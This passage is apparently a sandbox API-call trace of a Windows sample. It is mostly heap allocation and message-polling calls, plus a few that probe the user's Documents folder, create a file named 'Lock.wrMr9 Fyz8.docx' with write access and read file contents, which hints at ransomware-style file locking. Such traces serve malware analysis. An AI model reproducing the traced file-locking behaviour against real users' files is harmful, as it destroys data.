[0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0221.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0221.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0221.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38545d8 [0221.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.835] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0221.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38545d8 | out: hHeap=0x2af0000) returned 1 [0221.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0221.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.wrMr9 Fyz8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.wrmr9 fyz8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0221.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0221.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0221.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0221.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0221.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0221.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e4020 [0221.840] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0221.841] ReadFile (in: hFile=0x4dc, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x454e, lpOverlapped=0x0) returned 1 [0221.842] ReadFile (in: hFile=0x4dc, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0221.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x454e) returned 0x2a8a138 [0221.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e4020 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0221.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0221.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0221.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x454e) returned 0x2a8e690 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x454e) returned 0x2a8a138 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0221.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0221.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0221.847] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0221.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0221.847] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0221.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0221.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x454e) returned 0x2a8a138 [0221.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0221.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0221.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0221.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0221.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x454e) returned 0x2a92be8 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0221.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0221.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0221.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0221.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0221.853] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0221.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0221.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0221.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0221.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0221.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.855] RtlAllocateHeap (HeapHandle=0x2af0000, 